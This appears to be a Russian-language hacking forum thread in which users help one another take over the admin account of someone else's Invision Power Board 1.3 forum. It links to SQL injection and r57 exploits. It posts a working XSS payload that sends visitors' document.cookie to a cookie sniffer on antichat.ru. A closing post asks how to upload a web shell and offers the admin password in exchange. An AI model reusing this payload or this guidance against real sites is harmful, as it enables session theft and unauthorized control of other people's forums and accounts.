![]() |
Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.
Вот есть форум данной версии. Админ на форум не заходит (нельзя украсть куки), но форум живет бурной жизнью. Надо получить доступ к нику админа или дать админские права конкретным пользователям. Кто что может сказать по этому поводу?
|
Сделай на форум SQL injection
|
пробовал. асю дай.
|
http://www.securitylab.ru/vulnerabil...rce/211900.php
вот те сплойт |
асю кто нить оставте!
|
Цитата:
реально попробуй сплойтом... |
_http://forum.antichat.ru/thread15678.html
Надеюсь поможет |
Вот тебе великолепный сайт с ответом на твой вопрос:
http://www.yandex.ru/yandsearch?stype=&nl=0&text=%E2%E7%EB%EE%EC+Invisi on+Power+Board%28U%29+v1.3+Final+ |
Кинь мне в ПМ ссылку на форум попробую помочь
|
Или мне
|
Посмотрел я форум...
Сплоит (по крайней мере у меня) не работает... Зато есть XSS (Может админ проснется и заглотит его) Просто запости его как сообщение Код:
[e*mail]wj@wj[u*rl=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`Где http://antichat.ru/cgi-bin/s.jpg? Это ссылка на сниффер на данный момент куки должны прилететь сюда http://www.antichat.ru/sniff/log.php Советую создать свой собственный сниффер так как он более удобный чем паблик. |
http://rst.void.ru/download/r57ipb2.txt
|
Я его и юзал
|
PHP код:
|
Барсик, а сообщение должно отправится пустое если все правильно будет?
|
Если да, то что то не правильно после отпраки сообщение показывается так
.com'>wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);` |
Если да, то что то не правильно после отпраки сообщение показывается так
.com'>wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);` |
Мужики, подскажите как шелл залить на 1.3 Final?
Я так понял, что загрузку смайликов в коде админ выкинул, т.к. даже на добавление простого jpg выдает ошибку загрузки. что ещё можно придумать? если что пишити в личку, дам форум и пароль админа. |
| Время: 09:15 |